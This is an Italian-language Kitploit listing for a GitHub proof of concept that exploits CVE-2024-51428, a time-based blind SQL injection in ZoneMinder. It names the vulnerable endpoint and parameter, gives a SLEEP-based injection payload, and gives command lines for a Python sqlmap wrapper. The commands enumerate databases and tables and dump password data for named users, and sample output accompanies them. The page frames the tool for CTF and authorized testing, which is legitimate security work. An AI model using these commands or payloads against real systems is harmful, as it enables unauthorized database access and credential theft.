Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-51428-PoC — Wrapper in Python per sfruttare CVE-2024-51428 in ZoneMinder utilizzando Blind SQL Injection con sqlmap, automatizzando l'enumerazione di database, tabelle e l'estrazione dei dati con output pulito. | Kitploit
Strumenti/GitHubGitHub/d1se0/cve-2024-51428-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHubd1se0/cve-2024-51428-poc

CVE-2024-51428-PoC

Wrapper in Python per sfruttare CVE-2024-51428 in ZoneMinder utilizzando Blind SQL Injection con sqlmap, automatizzando l'enumerazione di database, tabelle e l'estrazione dei dati con output pulito.

Vedi Repository
15 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-51428 - PoC di Blind SQL Injection in ZoneMinder

Wrapper Python per sqlmap progettato per sfruttare CVE-2024-51428 in ZoneMinder.
Questo strumento automatizza il rilevamento e lo sfruttamento di una vulnerabilità Blind SQL Injection mantenendo l'output pulito e focalizzato sui dati utili.

Lo script nasconde i log di sqlmap e mostra solo informazioni rilevanti come:

  • Punto di iniezione rilevato
  • Nomi dei database
  • Tabelle
  • Credenziali o dati sensibili estratti

Ciò rende lo strumento ideale per ambienti CTF, dimostrazioni e test di sicurezza.


Panoramica della vulnerabilità

CVE: CVE-2024-51428
Tipo: Blind SQL Injection
Software interessato: ZoneMinder
Vettore d'attacco: Parametro HTTP GET
Parametro: tid

La vulnerabilità esiste nel seguente endpoint:

root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=

Il parametro tid non viene adeguatamente sanificato prima di essere utilizzato in una query al database, consentendo agli attaccanti di iniettare query SQL.

La tecnica di sfruttamento utilizzata è time-based blind SQL injection.

Esempio di payload scoperto da sqlmap:

root@kitploit:~
tid=1 AND (SELECT 3475 FROM (SELECT(SLEEP(5)))BZWD)

Questo payload forza il database a dormire se la query viene eseguita con successo, confermando la presenza di SQL injection.


Caratteristiche

  • Rilevamento automatico di Blind SQL Injection
  • Enumerazione dei database
  • Enumerazione delle tabelle
  • Dump delle tabelle
  • Filtraggio delle colonne
  • Filtraggio delle righe
  • Output pulito (log di sqlmap nascosti)
  • Progettato per CTF e laboratori di pentesting

Requisiti

  • Python 3
  • sqlmap

Installa sqlmap se necessario:

root@kitploit:~
sudo apt install sqlmap

Utilizzo

Sintassi di base:

root@kitploit:~
python3 poc.py --url <TARGET_URL> -c '<ZMSESSID_COOKIE>'

Con questo comando verifichiamo se è vulnerabile o meno

Esempio:

root@kitploit:~
python3 poc.py --url http://target.htb -c '151fvdqmjkhnkfat7l5epgmd22'

Ottenere il cookie richiesto

L'exploit richiede un cookie di sessione valido di ZoneMinder.

Passaggi:

  1. Apri il target nel browser
  2. Apri gli strumenti di sviluppo
  3. Naviga su:
root@kitploit:~
Application → Cookies
  1. Individua il cookie chiamato:
root@kitploit:~
ZMSESSID
  1. Copia il suo valore e usalo con -c

Esempio:

root@kitploit:~
-c '151fvdqmjkhnkfat7l5epgmd22'

Verificare se il target è vulnerabile

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE'

Output di esempio:

root@kitploit:~
[*] Checking vulnerability...

Parameter: tid (GET)
Type: time-based blind
Payload: tid=1 AND (SELECT(SLEEP(5)))

[+] TARGET IS VULNERABLE TO BLIND SQL INJECTION

Enumerare i database

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d

Output di esempio:

root@kitploit:~
available databases [3]:
information_schema
mysql
zm

Enumerare le tabelle

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm

Output di esempio:

root@kitploit:~
Database: zm

Users
Events
Monitors
Storage

Dump di una tabella

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users

Dump di una colonna specifica

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -f Username

Esempio:

root@kitploit:~
+----------+
| Username |
+----------+
| admin    |
| viewer   |
+----------+

Filtrare le righe (clausola WHERE)

Puoi filtrare le righe usando:

root@kitploit:~
-ff <COLUMN> <VALUE>

Esempio:

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Password -ff Username mark

SQL equivalente:

root@kitploit:~
WHERE Username='mark'

Dump della password per un utente specifico

Esempio:

root@kitploit:~
python3 poc.py \
--url http://target.htb \
-c 'COOKIE' \
-d -db zm -t Users \
-f Password \
-ff Username mark

Comando sqlmap interno:

root@kitploit:~
sqlmap -D zm -T Users -C Password --where="Username='mark'" --dump

Come funziona lo strumento

Lo script agisce come un wrapper attorno a sqlmap.

Passaggi eseguiti internamente:

  1. Costruisce l'endpoint vulnerabile
root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=1
  1. Passa il cookie di autenticazione a sqlmap
  2. Esegue sqlmap con opzioni ottimizzate:
root@kitploit:~
--threads=10
--technique=T
--batch
  1. Analizza l'output di sqlmap in tempo reale
  2. Filtra i log e mostra solo:
  • informazioni sull'iniezione
  • database
  • tabelle
  • dati estratti

Utilizzo previsto

Questo strumento è stato creato per:

  • Sfide Capture The Flag
  • Ricerca sulla sicurezza
  • Scopi educativi
  • Laboratori di pentesting

Disclaimer

Questo progetto è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati.

L'autore non è responsabile per l'uso improprio di questo strumento.

Ottieni sempre l'autorizzazione appropriata prima di testare qualsiasi sistema.


Autore

Ricerca sulla sicurezza / strumenti per CTF

Scarica lo strumento